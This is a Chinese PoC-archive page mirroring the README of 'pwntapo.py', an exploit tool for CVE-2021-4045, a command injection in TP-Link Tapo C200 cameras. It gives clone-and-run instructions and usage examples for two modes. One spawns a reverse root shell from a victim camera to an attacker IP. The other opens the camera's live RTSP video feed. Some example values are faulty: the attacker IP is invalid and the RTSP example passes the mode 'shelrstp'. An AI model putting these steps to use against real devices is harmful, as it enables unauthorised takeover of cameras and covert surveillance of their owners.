目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2021-4045 PoC — Tp-link Tapo C200 命令注入漏洞

来源
https://github.com/0xbinder/CVE-2021-4045
关联漏洞
标题:Tp-link Tapo C200 命令注入漏洞 (CVE-2021-4045)
Description:Tp-link Tapo C200是中国普联(Tp-link)公司的一款网络摄像头设备。 Tp-link Tapo C200 网络摄像头 1.1.15及其之前的固件版本存在安全漏洞,该漏洞源于软件中存在默认以root身份运行的uhttpd二进制文件,该文件缺少对于命令参数的过滤和转义。未经身份验证的攻击者可以通过特殊的命令请求利用该漏洞在系统上执行系统命令。
Description
🔐 "PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)" 🔓
介绍
## TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) (CVE-2021-4045)

🔐 "PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)" 🔓

Read about the exploit from [exploit db](https://www.exploit-db.com/exploits/51017)

This is a command injection vulnerability that affect all  TP-Link Tapo c200 camera firmware versions < 1.1.16 Build 211209 Rel. 37726N. To read more about how the exploit works read this article from [hacefresko](https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce)

## Installation
```
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h
```
## Usage
```shell
python3 pwntapo.py -h

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]

PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)

options:
  -h, --help  show this help message and exit
  -M M        attack mode : shell | rtsp (default: None)
  -U U        RTSP_USER (default: None)
  -P P        RTSP_PASSWORD (default: None)
  -C C        RTSP_CIPHERTEXT (default: None)
  -H H        victim ip address (default: None)
  -A A        attacker ip address (default: None)
  -p P        Listening port (default: None)
  -v          increase output verbosity (default: False)
```

The exploit has two modes SHELL and RSTP. 

## SHELL
In the shell mode you need to provide the victim ip, attacker ip and the listening port only and this will spawn a root shell in the device. 
```shell
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Listening on port 1887...
[+] Sending reverse shell to 192.168.110.121...

Listening on 0.0.0.0 1887
```
## RSTP
In the RSTP mode you'll need to provide the RSTP_USER, PASSWORD AND CIPHERTEXT to be able to get a live footage from the camera
```shell
python3 pwntapo.py -M shelrstp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Setting up RTSP video stream...
```
## CAUTION DO NOT RUN THE TOOL ON DEVICES WITHOUT USER PERMISSION
文件快照

 [4.0K]  /data/pocs/6f64748cd9cd59609afd6320c32c56e511288eab
├── [4.2K]  pwntapo.py
├── [4.2K]  README.md
└── [  48]  requirements.txt

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →